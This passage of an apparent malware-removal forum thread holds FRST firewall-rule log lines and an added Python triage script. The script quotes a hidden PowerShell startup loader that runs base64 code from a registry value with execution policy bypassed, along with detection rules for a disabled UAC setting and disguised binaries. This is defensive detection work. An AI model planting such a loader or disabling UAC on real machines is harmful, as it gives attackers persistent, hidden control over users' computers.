FirewallRules: [{C682952A-D6C1-40B0-9C07-6F39BBC89F9A}] => (Allow) LPort=8370
FirewallRules: [{898892CE-EA9B-4726-A816-2581F93BA3B1}] => (Allow) C:\Program Files (x86)\GarenaLoLPH\GameData\Apps\LoLPH\Game\League of Legends.exe
FirewallRules: [{A406CB39-B19C-4A9B-B01C-2AEE3193F7BD}] => (Allow) C:\Program Files (x86)\GarenaLoLPH\GameData\Apps\LoLPH\Game\League of Legends.exe
FirewallRules: [{FF6FEBDD-0057-4F02-9352-A750B6EA1D20}] => (Allow) C:\Program Files (x86)\PCData\cudaminer.exe
FirewallRules: [{A9F64B4C-28C4-4A45-8526-A604438D5282}] => (Allow) C:\Program Files (x86)\PCData\cudaminer.exe
FirewallRules: [{C881CB14-DA97-4438-9394-270CE79B19B4}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{61927E13-DA49-4727-A060-B9C2B98CF5A1}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{54271DB6-ADA7-4801-8B6D-F5146085EF31}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [{8DCCC0F5-804A-4253-B936-A9E52B38AD13}] => (Allow) C:\GarenaDownload\Games\blackshot\Blackshot_GarenaPlus_Installer.exe
FirewallRules: [{99CF3F38-5697-45AF-9923-4161FFC019B8}] => (Allow) C:\GarenaDownload\Games\blackshot\Blackshot_GarenaPlus_Installer.exe
FirewallRules: [{081BCF64-D3F8-4ED6-B9BA-31F475F3873B}] => (Allow) C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\SonarHost.exe
FirewallRules: [{20B5EC6D-E2E2-4E79-A90C-5DC063CD506B}] => (Allow) C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\SonarHost.exe
FirewallRules: [TCP Query User{99972C58-BFC7-4586-9EB6-776B56C63C08}C:\users\betts\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\betts\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{BAF658B2-154E-4F20-98EA-BDAA7696FC04}C:\users\betts\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\betts\appdata\roaming\spotify\spotify.exe
FirewallRules: [{0D1F6826-BC17-4608-BD17-2A1CF5ABA034}] => (Block) C:\users\betts\appdata\roaming\spotify\spotify.exe
FirewallRules: [{AEE1F1C9-8E9B-422A-AD55-3BA7891501EA}] => (Block) C:\users\betts\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{5CFA7A9A-DAD1-4EE4-B2AB-9AA4F8C624DE}C:\windows\syswow64\javaw.exe] => (Allow) C:\windows\syswow64\javaw.exe
FirewallRules: [UDP Query User{D9DBB5CB-B9C6-42C3-8B20-1289FEB9F5CD}C:\windows\syswow64\javaw.exe] => (Allow) C:\windows\syswow64\javaw.exe
FirewallRules: [{DA421E0D-BE2C-4FDE-9CE1-7B748E8D0A49}] => (Block) C:\windows\syswow64\javaw.exe
FirewallRules: [{A916441E-AD9E-43CA-8D9F-EBA03AB3F06E}] => (Block) C:\windows\syswow64\javaw.exe
FirewallRules: [{20CBE20B-FCD6-40D1-8D2D-349AB644075A}] => (Allow) LPort=6993
FirewallRules: [{40CFA6C9-7332-46F5-93DF-CAD9B029F9DA}] => (Allow) LPort=6993
FirewallRules: [{3BA636CC-291E-4C5C-AD9F-68857276B5B2}] => (Allow) LPort=6887
FirewallRules: [{A28D90B8-AD90-418E-A701-7754FF60198E}] => (Allow) LPort=6887
FirewallRules: [{20A92978-3821-40F9-86E3-761F950A6782}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{4B4957A1-CE42-4924-9B7A-B587B1B0CFCE}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{CA82FB53-A838-4668-9D02-EF8DA7890A83}] => (Allow) LPort=6920
FirewallRules: [{620066E0-8634-4DFA-9AAF-22DFB8ACB685}] => (Allow) LPort=6920
FirewallRules: [{BB9CDCBD-6587-4B50-B179-4C03EFDC1673}] => (Allow) LPort=53515
FirewallRules: [{D9AD76E5-98A4-4B3D-B86F-FA927911EDBC}] => (Allow) LPort=53515
FirewallRules: [{35EB427C-8DAA-45AE-8672-7D5489F4AF90}] => (Allow) LPort=6956
FirewallRules: [{ED21F6E1-C41D-411A-8AC0-67A404A66071}] => (Allow) LPort=6956
FirewallRules: [{7C8C1282-F6BE-4FB5-BA02-0E3D63BBB46D}] => (Allow) LPort=6961
FirewallRules: [{F1C385E5-8377-4EE9-B037-6B85BD288355}] => (Allow) LPort=6961
FirewallRules: [{40ADEBA9-AEFE-4DC7-8115-3269C2C53DC4}] => (Allow) LPort=6943
FirewallRules: [{1DF7A37D-6F36-4C6F-B47B-F8F76499DC7D}] => (Allow) LPort=6943
FirewallRules: [{52262082-F68E-4750-9D70-CC4540BC21B2}] => (Allow) LPort=6954
FirewallRules: [{058AE8F6-1C0A-4C97-A0EF-3F93D6D49B3D}] => (Allow) LPort=6954
FirewallRules: [{6AC9E325-4848-4C3D-A0B4-F25E6052EDCF}] => (Allow) LPort=6901
FirewallRules: [{4B42FEA5-6D01-492D-8C4F-5F3F5B7B361D}] => (Allow) LPort=6901
FirewallRules: [{50CD4BB1-2AD9-4E26-8DF6-A799AB2A5D8B}] => (Allow) LPort=6986
FirewallRules: [{1A506B80-DD9F-4AC8-8FDF-D7AA9997020D}] => (Allow) LPort=6986
FirewallRules: [TCP Query User{17D22E81-EBAC-41FF-A960-4C67DED49F76}C:\program files (x86)\counter-strike 1.6\hl.exe] => (Allow) C:\program files (x86)\counter-strike 1.6\hl.exe
FirewallRules: [UDP Query User{B380394B-4F8C-4069-9D8E-55B4D4C2A09A}C:\program files (x86)\counter-strike 1.6\hl.exe] => (Allow) C:\program files (x86)\counter-strike 1.6\hl.exe
FirewallRules: [{CEC99383-1E65-4A5E-8543-A452A66648B0}] => (Block) C:\program files (x86)\counter-strike 1.6\hl.exe
FirewallRules: [{B8FB3085-D5EF-4E53-8590-A3E953C6B741}] => (Block) C:\program files (x86)\counter-strike 1.6\hl.exe
FirewallRules: [{E24C0618-016D-405B-A5E5-4F5B2BFCF08F}] => (Allow) C:\Program Files (x86)\Hadouken\hadouken.exe
FirewallRules: [{19106E0F-92C5-449A-BBA7-4F5328B98CFA}] => (Allow) LPort=6955
FirewallRules: [{FE8DBF92-38B3-41CB-BD46-3B41B7DC5B9D}] => (Allow) LPort=6955
FirewallRules: [{C97F8183-FD68-4C06-BCD9-33A233B40AB3}] => (Allow) LPort=6969
FirewallRules: [{82A4EFBB-175C-49CC-8B38-BEACBA7260E9}] => (Allow) LPort=6969
FirewallRules: [{8A58C784-5BCC-4983-812E-1A532C351AA2}] => (Allow) LPort=6894
FirewallRules: [{1C3CA90A-48FC-44CD-887B-A45052741253}] => (Allow) LPort=6894
FirewallRules: [{185DEF5D-A0D3-4881-AB2C-48E5BD8A37B9}] => (Allow) LPort=6893
FirewallRules: [{D14E1C3C-C378-459C-A727-3EC8C699EAD4}] => (Allow) LPort=6893
FirewallRules: [{0DF4F7B1-2417-430F-8B89-DA2E9D332ABF}] => (Allow) LPort=6959
FirewallRules: [{18A9FAA0-5CC2-451B-A530-66EEB249E223}] => (Allow) LPort=6959
FirewallRules: [{35CD5408-85C3-41A1-A341-AD394632EA46}] => (Allow) LPort=6918
FirewallRules: [{D84516E6-6258-4F99-A9DF-0585F5F6411D}] => (Allow) LPort=6918
FirewallRules: [{9F6BF43D-9F02-4914-98DD-2B55DB82509F}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{1FA0AAD9-B93F-41EA-AF69-1D6DB4452E8B}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{C10CD7BB-4934-49B3-980E-329F3F4A1CA7}] => (Allow) LPort=6953
FirewallRules: [{55A0DD9D-CBD8-4455-BEFD-B8ACE807A192}] => (Allow) LPort=6953
FirewallRules: [{064693B1-2836-40F9-BF98-8D5BA8DE555B}] => (Allow) LPort=6940
FirewallRules: [{D79DD6F2-512D-41D0-984E-9A0762254AF6}] => (Allow) LPort=6940
FirewallRules: [{A05C47B6-CDA9-4652-994A-05109349549F}] => (Allow) LPort=6917
FirewallRules: [{DB826D5D-2091-4FDC-A756-E90DE15AADB5}] => (Allow) LPort=6917
FirewallRules: [{57F0F001-9E82-49BB-8CD3-E028E35AFD5A}] => (Allow) LPort=6997
FirewallRules: [{9620B5A5-C4F8-4FAE-B6C3-4A65DBCE2FA4}] => (Allow) LPort=6997
FirewallRules: [{59A0140A-76DF-4E52-8DCA-FDC42E6F3EE1}] => (Allow) LPort=6881
FirewallRules: [{6E04FBBB-E632-4E64-ABFA-7A025DE00BBC}] => (Allow) LPort=6881
FirewallRules: [{75C78F7A-8D0B-4A8E-B585-2EC9279CF145}] => (Allow) LPort=6945
FirewallRules: [{B274B02C-ACE4-4FCF-BBA2-ADE9498DD7F7}] => (Allow) LPort=6945
FirewallRules: [TCP Query User{713356C3-B8A0-4A2F-83A7-5085A208FCC5}C:\program files (x86)\deluge\deluge.exe] => (Allow) C:\program files (x86)\deluge\deluge.exe
FirewallRules: [UDP Query User{A0FD9750-30E1-433A-986C-F21221B795C9}C:\program files (x86)\deluge\deluge.exe] => (Allow) C:\program files (x86)\deluge\deluge.exe
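Added example, not part of any post in this thread and not FRST's code: a short Python triage script run over six lines copied from the log above. It flags the registry-resident PowerShell loader at the {C656898E-...} startupreg entry and pulls out the registry key and value name the `gp` call reads, flags the bare C:\ProgramData\audio.exe binary, the explorer.exe that lives outside C:\Windows, the executable under the stale C:\Windows.000 directory, and EnableLUA=0. The rule names and path heuristics are the example's own; the decode step uses a constructed base64 stand-in because the NIWFUVUXRL data itself does not appear in the log.

```python
"""Triage a few FRST lines for the indicators visible in this log (added example)."""
import base64
import re

# Lines copied verbatim from the FRST log in this thread.
# The Chrome entry is a benign control; the others are the ones worth a look.
SAMPLE_LINES = [
    r'MSCONFIG\startupreg: 1CC1D7FC1BE52E567AEF850DA74CD4EE2A175F87._service_run => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=service /prefetch:8',
    r'MSCONFIG\startupreg: 6879fe793de5f826544fc9bd3b3ae212 => "C:\ProgramData\audio.exe" ..',
    r"MSCONFIG\startupreg: {C656898E-5C97-4D32-B1BD-4DA1679104E8} => C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\HCLUXGUXIRVGPI').NIWFUVUXRL)));",
    r'FirewallRules: [TCP Query User{368BA747-8659-49AB-9EAC-4E071851DA36}C:\program files (x86)\microsoft\explorer\explorer.exe] => (Block) C:\program files (x86)\microsoft\explorer\explorer.exe',
    r'FirewallRules: [{FB10405A-F242-44F7-AC79-B1B62A81E2AA}] => (Allow) C:\Windows.000\WindowsDriver.exe',
    r'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: ) (ConsentPromptBehaviorUser: ) (EnableLUA: 0)',
]

# Executable path after "=>", with or without the (Allow)/(Block) verdict and quotes.
PATH_RE = re.compile(r'=>\s*(?:\((?:Allow|Block)\)\s*)?"?([A-Za-z]:\\[^"]*?\.exe)', re.IGNORECASE)
# (gp 'HKCU:\...\KEY').VALUENAME  -> where the loader keeps its stage-2 script.
REG_READ_RE = re.compile(r"\(gp\s+'([^']+)'\)\.(\w+)", re.IGNORECASE)
UAC_OFF_RE = re.compile(r"\(EnableLUA:\s*0\)")
# Names that legitimately live only under C:\Windows (heuristic list, example's own).
WINDOWS_ONLY_NAMES = {"explorer.exe", "svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe"}


def executable_path(line):
    """Return the .exe path a startupreg / FirewallRules line points at, or None."""
    m = PATH_RE.search(line)
    return m.group(1) if m else None


def is_fileless_ps_loader(line):
    """powershell + execution-policy bypass + iex + base64 + registry read."""
    low = line.lower()
    return ("powershell" in low and "bypass" in low and "iex" in low
            and "frombase64string" in low
            and ("gp " in low or "get-itemproperty" in low))


def triage_line(line):
    """Return a list of (rule, detail) findings for one FRST line."""
    findings = []
    if is_fileless_ps_loader(line):
        m = REG_READ_RE.search(line)
        where = f"{m.group(1)} (value {m.group(2)})" if m else "registry value not parsed"
        findings.append(("fileless-powershell-loader", where))
    if UAC_OFF_RE.search(line):
        findings.append(("uac-disabled", "EnableLUA=0"))
    path = executable_path(line)
    if path:
        low = path.lower()
        directory, _, name = low.rpartition("\\")
        if directory == "c:\\programdata":            # loose binary in ProgramData root
            findings.append(("exe-in-programdata-root", path))
        if name in WINDOWS_ONLY_NAMES and not (directory + "\\").startswith("c:\\windows\\"):
            findings.append(("windows-binary-lookalike", path))
        if re.match(r"c:\\windows\.\d+\\", low):      # C:\Windows.000 is a leftover install dir
            findings.append(("exe-in-stale-windows-dir", path))
    return findings


def triage(lines):
    """Flatten findings over many lines as (line_index, rule, detail)."""
    return [(i, rule, detail) for i, line in enumerate(lines)
            for rule, detail in triage_line(line)]


def decode_loader_value(value_b64):
    """Apply the loader's own transform: FromBase64String -> ASCII text handed to iex."""
    return base64.b64decode(value_b64, validate=True).decode("ascii")


# Constructed stand-in for the NIWFUVUXRL data (not present in the posted log).
# On the real machine the exported registry value would be fed in here instead.
CONSTRUCTED_VALUE = base64.b64encode(b"Write-Output 'stage-2 placeholder'").decode("ascii")

if __name__ == "__main__":
    for idx, rule, detail in triage(SAMPLE_LINES):
        print(f"line {idx}: {rule}: {detail}")
    print("decoded stand-in:", decode_loader_value(CONSTRUCTED_VALUE))
```

On a live case, export the HCLUXGUXIRVGPI key (reg export) before any fixlist deletes it and pass the exported value to decode_loader_value; once the key is gone the stage-2 script is gone with it.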
 

Broni

Malware Annihilator
FirewallRules: [{D54C28D4-1A2D-4CC6-A8F7-DAEC9C1043F7}] => (Block) C:\program files (x86)\deluge\deluge.exe
FirewallRules: [{D365CEB7-697E-4633-B046-AE50DC34571D}] => (Block) C:\program files (x86)\deluge\deluge.exe
FirewallRules: [{CD0510F3-16FB-4CBE-8FB4-6C32A64F1C6A}] => (Allow) LPort=6921
FirewallRules: [{0F841E01-98EC-4480-BA33-77733187B0D7}] => (Allow) LPort=6921
FirewallRules: [{F09E290D-2F1A-4CAA-818B-F829AB1FAF97}] => (Allow) LPort=6937
FirewallRules: [{43B8AA88-4BD8-4FF2-A3A9-05919231685F}] => (Allow) LPort=6937
FirewallRules: [{E28BD6BB-B51E-4376-A690-A3D08CA95738}] => (Allow) LPort=6896
FirewallRules: [{040EF130-CEA0-4197-B7EB-A5FEFFC896E9}] => (Allow) LPort=6896
FirewallRules: [TCP Query User{58149CDE-0D65-45DD-A39C-4981BEE6D1F0}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe] => (Allow) C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe
FirewallRules: [UDP Query User{44B72B2E-6F9C-4BDC-B150-FD02AC264108}C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe] => (Allow) C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe
FirewallRules: [{F2D75FA1-DA94-4FDB-8948-99D446AD638A}] => (Block) C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe
FirewallRules: [{556657E2-1C1B-4383-87C9-A951BFD4C87C}] => (Allow) C:\Program Files (x86)\Droid4X\Droid4X.exe
FirewallRules: [{EF6257FB-E6E2-4503-98A7-51DE4CF6F995}] => (Allow) C:\Program Files (x86)\Droid4X\download\MiniThunderPlatform.exe
FirewallRules: [{99D1174A-0878-4157-B3E9-7C9D99F758FA}] => (Allow) C:\Program Files (x86)\Droid4X\download\MiniThunderPlatform.exe
FirewallRules: [{F727B2EE-60E6-4D98-8E6A-D9C41E240640}] => (Allow) C:\Program Files\Oracle\VirtualBox\vboxheadless.exe
FirewallRules: [{AC225A2F-315F-4531-8715-668C83B06E14}] => (Allow) LPort=6914
FirewallRules: [{6C8D183A-1181-4B43-8A99-11F41032BD78}] => (Allow) LPort=6914
FirewallRules: [{1E8366BB-D5E2-42D9-AA11-AA803AC831A3}] => (Allow) LPort=6898
FirewallRules: [{AD4D3B65-8CCB-4990-8CC7-7ED512AE9514}] => (Allow) LPort=6898
FirewallRules: [{5DB1BB90-522C-4382-A4CC-A77AA9A780D9}] => (Allow) C:\Program Files (x86)\AirPrint\airprint.exe
FirewallRules: [{1E3C4EE8-7840-48CC-A72E-51BEF5FADEDD}] => (Allow) C:\Program Files (x86)\AirPrint\airprint.exe
FirewallRules: [{3E0C8D1A-EB77-4D6D-AD49-3C6BF3F176FB}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{EA6AD7C4-B625-4CF8-ABF4-D32106C6BDBC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{DFC5CD23-8D43-419A-8032-AC034BD500E8}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{1044309F-50FC-4DD1-BDAC-C5B3677D89F7}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{77603616-95DD-4B2E-8B62-E206B6F3EB98}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{6029E389-3099-4B5A-BE96-11174397FFA2}] => (Allow) C:\Program Files\App Dynamic\AirServer\AirServer.exe
FirewallRules: [{D796B6FE-7CDF-43BA-B000-F80D2ED80A5B}] => (Allow) C:\Program Files\App Dynamic\AirServer\AirServer.exe
FirewallRules: [{1B6CE9B8-FB33-4380-A1BF-E40D9BFF5E19}] => (Allow) LPort=6913
FirewallRules: [{1324C0E3-5988-4332-9241-75EBD746FFE6}] => (Allow) LPort=6913
FirewallRules: [TCP Query User{DEE05DC9-7F2F-4094-9FB7-B459E74E1E73}C:\users\betts\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\betts\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{4D22F139-3BEE-4BE7-A0FC-93583E111F7E}C:\users\betts\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\betts\appdata\local\akamai\netsession_win.exe
FirewallRules: [{5F32E736-AC3E-4645-A4F4-A48B05344A4A}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{2289EF63-4BA7-4045-B298-9A81D2EF3D11}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [TCP Query User{E9BB70FE-EBD3-4B64-AD14-EFC0B00F9E32}C:\users\betts\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\betts\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{59959C16-FA82-42D1-98AE-C85FCF95A246}C:\users\betts\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\betts\appdata\local\akamai\netsession_win.exe
FirewallRules: [{4A4AAD24-1DA5-4E8D-AB15-28286D973E52}] => (Allow) LPort=6956
FirewallRules: [{E77088E9-6C4B-4959-A68E-0DD3F65436AC}] => (Allow) LPort=6956
FirewallRules: [{B9B92A0C-CEFA-4EBB-8BA7-347897C7ACDA}] => (Allow) LPort=6921
FirewallRules: [{71FF6163-5B90-494B-B3A5-1AAAD28716EF}] => (Allow) LPort=6921
FirewallRules: [{ABAC801B-CF20-47C8-96F3-9A914E15F2F2}] => (Allow) LPort=6927
FirewallRules: [{61F92B82-ACA3-4088-86B0-01F535F3BDD2}] => (Allow) LPort=6927
FirewallRules: [{7CEB6C14-F605-454D-98D4-BCB550F3CE53}] => (Allow) LPort=6896
FirewallRules: [{747E84AB-EE42-4B68-8ADC-4D77F442F081}] => (Allow) LPort=6896
FirewallRules: [TCP Query User{40C80D61-9F12-42CC-9C1E-3459C0B80696}C:\garenadownload\games\lollcuph\lollcuphinstaller.exe] => (Allow) C:\garenadownload\games\lollcuph\lollcuphinstaller.exe
FirewallRules: [UDP Query User{B52DBF35-3751-42DB-85A6-2816F541B9E3}C:\garenadownload\games\lollcuph\lollcuphinstaller.exe] => (Allow) C:\garenadownload\games\lollcuph\lollcuphinstaller.exe
FirewallRules: [{912D6DDF-1218-4CC6-9EA6-34A8B155F12A}] => (Allow) LPort=6917
FirewallRules: [{30AA60B8-C068-420F-95FD-8F08A827DF9F}] => (Allow) LPort=6917
FirewallRules: [TCP Query User{9F27144C-7D2B-4541-8BCF-9FB45B607822}C:\program files\qcma\qcma.exe] => (Allow) C:\program files\qcma\qcma.exe
FirewallRules: [UDP Query User{74A8591A-4AD0-4E2E-85E2-0BF63311AABA}C:\program files\qcma\qcma.exe] => (Allow) C:\program files\qcma\qcma.exe
FirewallRules: [{28BB5F07-8AC1-4DF8-A5A7-FADDCAF6F541}] => (Allow) LPort=6962
FirewallRules: [{15102DC1-0BDC-4C9A-81CF-45092856DCED}] => (Allow) LPort=6962
FirewallRules: [{0C9A3D22-5740-4A52-8F58-B197BCF821E8}] => (Allow) LPort=6886
FirewallRules: [{256DC5C2-60F7-4A31-BE53-77C3193C1AB4}] => (Allow) LPort=6886
FirewallRules: [{354B376F-D838-4267-9C10-47EC376BEB63}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{CD74D535-B3B8-4C6A-A094-470491A3BA6D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{65B0C4B0-40B4-41D4-A6AE-57E9A4C6B4E4}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{AC702F5D-359E-4BFF-9E59-1BA3CD3FC12B}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{816EE104-0E87-450F-BD65-331DE3DBA835}] => (Allow) C:\Program Files (x86)\OSTotoSoft\DriverTalent\DriverTalent.exe
FirewallRules: [{68156B91-CF34-473E-AB1A-FFE48978ABE6}] => (Allow) C:\Program Files (x86)\OSTotoSoft\DriverTalent\DTLService.exe
FirewallRules: [TCP Query User{2DEDE834-8850-48FE-B32E-D70E94DB655E}C:\program files (x86)\mobile gamepad server\mobile gamepad.exe] => (Allow) C:\program files (x86)\mobile gamepad server\mobile gamepad.exe
FirewallRules: [UDP Query User{845ABD8A-3861-4F10-8845-70A95F539B4E}C:\program files (x86)\mobile gamepad server\mobile gamepad.exe] => (Allow) C:\program files (x86)\mobile gamepad server\mobile gamepad.exe
FirewallRules: [{C8D58DDC-82EC-4B36-AACE-2B52219CDE9F}] => (Allow) C:\Program Files\Acrylic Wi-Fi Professional\Acrylic.exe
FirewallRules: [{A9DE7928-B3E5-4490-9AFE-996A35A97D6E}] => (Allow) C:\Program Files\Acrylic Wi-Fi Professional\Acrylic.exe
FirewallRules: [{59442BF0-92CF-4C9A-B344-317CD12553D1}] => (Allow) LPort=49197
FirewallRules: [{CD623D4E-E775-4FB2-89B5-50087584E325}] => (Allow) LPort=5000
FirewallRules: [{9EFE0349-207D-456D-AD5E-949C126F1CF6}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{FB10405A-F242-44F7-AC79-B1B62A81E2AA}] => (Allow) C:\Windows.000\WindowsDriver.exe
FirewallRules: [{36CDEA2A-3CC5-4BC2-8729-EDB973DE0900}] => (Allow) C:\Windows.000\WindowsDriver.exe
FirewallRules: [{765D9889-7366-4C10-8515-A22250070418}] => (Allow) LPort=45560
FirewallRules: [TCP Query User{368BA747-8659-49AB-9EAC-4E071851DA36}C:\program files (x86)\microsoft\explorer\explorer.exe] => (Block) C:\program files (x86)\microsoft\explorer\explorer.exe
FirewallRules: [UDP Query User{E5ED5053-B0D8-4CBD-901B-2F4C3050EBE7}C:\program files (x86)\microsoft\explorer\explorer.exe] => (Block) C:\program files (x86)\microsoft\explorer\explorer.exe
FirewallRules: [TCP Query User{9D1F6303-B5D0-4014-9D3A-3DD4BD77A6CF}C:\users\betts\documents\mobaxterm\slash\bin\xwin_mobax.exe] => (Allow) C:\users\betts\documents\mobaxterm\slash\bin\xwin_mobax.exe
FirewallRules: [UDP Query User{E317E324-0D1B-462F-BC06-C98BC590D586}C:\users\betts\documents\mobaxterm\slash\bin\xwin_mobax.exe] => (Allow) C:\users\betts\documents\mobaxterm\slash\bin\xwin_mobax.exe
FirewallRules: [{D29C9F64-A1CE-4743-B8E7-14957B4B6883}] => (Allow) D:\steam\Steam.exe
FirewallRules: [{F7D7CA35-0E6F-4CF9-AADC-1727C73C1BE5}] => (Allow) D:\steam\Steam.exe
FirewallRules: [TCP Query User{805E6E46-5C23-4FD8-A26C-E7131867AD3B}C:\program files (x86)\garenalolph\gamedata\apps\lolph\leagueclient\leagueclient.exe] => (Allow) C:\program files (x86)\garenalolph\gamedata\apps\lolph\leagueclient\leagueclient.exe
FirewallRules: [UDP Query User{5E55CC32-330E-427B-AC33-3D13226C5562}C:\program files (x86)\garenalolph\gamedata\apps\lolph\leagueclient\leagueclient.exe] => (Allow) C:\program files (x86)\garenalolph\gamedata\apps\lolph\leagueclient\leagueclient.exe
FirewallRules: [{3F3AA956-A3E0-4CAA-8F18-2F414FB764A2}] => (Allow) C:\Windows\KMS-R@1n.exe
FirewallRules: [{E3854BBF-9A19-452A-89A0-959BF2EF2B3F}] => (Allow) C:\Windows\KMS-R@1n.exe
FirewallRules: [{39DF7D2E-9042-4EF2-8D38-1257E2D69C76}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1808.0718\gxxsvc.exe
FirewallRules: [{97C03D0C-09CD-4B43-A96A-93D60B7A5F0C}] => (Allow) D:\steam\bin\cef\cef.win7x64\steamwebhelper.exe
FirewallRules: [{625E4791-DAA9-42BC-B7DF-06AAE5304904}] => (Allow) D:\steam\bin\cef\cef.win7x64\steamwebhelper.exe
FirewallRules: [{3BB57094-521B-43C7-BB74-E94A783F49C9}] => (Allow) D:\steam\steamapps\common\Shadowrun Returns\Shadowrun.exe
FirewallRules: [{DED9CFCF-5B35-492A-A237-2346E749C671}] => (Allow) D:\steam\steamapps\common\Shadowrun Returns\Shadowrun.exe
FirewallRules: [{48C712DD-8BDA-4054-A57A-F15AB26D1894}] => (Allow) D:\steam\steamapps\common\EVGA PrecisionX\PrecisionX_x64.exe
FirewallRules: [{30836289-A1D5-4101-AE61-E93AB84F2E21}] => (Allow) D:\steam\steamapps\common\EVGA PrecisionX\PrecisionX_x64.exe
FirewallRules: [{091558FC-AA5D-4A0F-ADB7-57CF8C8D2C44}] => (Allow) D:\steam\steamapps\common\EVGA PrecisionX\Skins\UxfTool.exe
FirewallRules: [{85680DF2-C8C4-42EB-90CD-F116473C13CF}] => (Allow) D:\steam\steamapps\common\EVGA PrecisionX\Skins\UxfTool.exe
FirewallRules: [{FAFA77E5-2933-4767-9AFD-04564C0F2D9A}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{A742D13E-398D-4F1F-9998-DE1BE7E7688A}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{191AB890-BC9C-47E7-BEBE-FFEE55BDD0E2}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{BF63C3C6-F0D5-494C-8FD5-6814532B64E4}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{A7DC9A53-3EE4-4D87-9CE6-59FB59316143}] => (Allow) C:\ProgramData\audio.exe
FirewallRules: [{6A562CFB-BA08-4E69-B474-AD11C8F29BE4}] => (Allow) C:\ProgramData\audio.exe
FirewallRules: [{BC891867-6204-4CEB-8B9B-03433BD4EBCE}] => (Allow) C:\Program Files (x86)\MediaMonkey\MediaMonkey (non-skinned).exe
FirewallRules: [{85D486BB-54BD-4651-9E87-48B580C66C8E}] => (Allow) C:\Program Files (x86)\MediaMonkey\MediaMonkey (non-skinned).exe
FirewallRules: [{40F6E944-1B85-4266-B724-10A0CB51EC54}] => (Allow) C:\Program Files (x86)\MediaMonkey\MediaMonkey (non-skinned).exe
FirewallRules: [{8BBDD2B3-4B4E-41D1-B0C3-B955D4ED0934}] => (Allow) D:\CsGO Warzone\Loader.exe
FirewallRules: [{F2772A23-4D51-4827-BA3F-B73FB0366357}] => (Allow) D:\CsGO Warzone\csgo_launcher.exe
FirewallRules: [TCP Query User{DEC7795F-EA3A-4EEC-A96D-151A4501FD61}D:\csgo warzone\csgo.exe] => (Allow) D:\csgo warzone\csgo.exe
FirewallRules: [UDP Query User{6432F456-4F38-46C8-B0F9-304EE6363924}D:\csgo warzone\csgo.exe] => (Allow) D:\csgo warzone\csgo.exe
FirewallRules: [{9BB38CC9-7A2F-40E2-AE8F-238D0DA24788}] => (Allow) C:\Program Files (x86)\arcai.com\aips.exe
FirewallRules: [{361AD987-1870-4C5F-A49B-CCE402AFC7EA}] => (Allow) C:\Program Files (x86)\arcai.com\aips.exe
FirewallRules: [{258B0671-537A-4683-ABE8-633BFC69FD02}] => (Allow) C:\Program Files (x86)\arcai.com\netcut_windows.exe
FirewallRules: [{F5016CA6-53E9-4C2B-A70C-443D53838102}] => (Allow) C:\Program Files (x86)\arcai.com\netcut_windows.exe
FirewallRules: [{B1EA146C-D8A9-419B-9887-8202D3B8C61B}] => (Allow) C:\ProgramData\audio.exe
FirewallRules: [{29BD916A-58BB-4DF6-B96E-F977ECDD3781}] => (Allow) C:\ProgramData\audio.exe

==================== Restore Points =========================

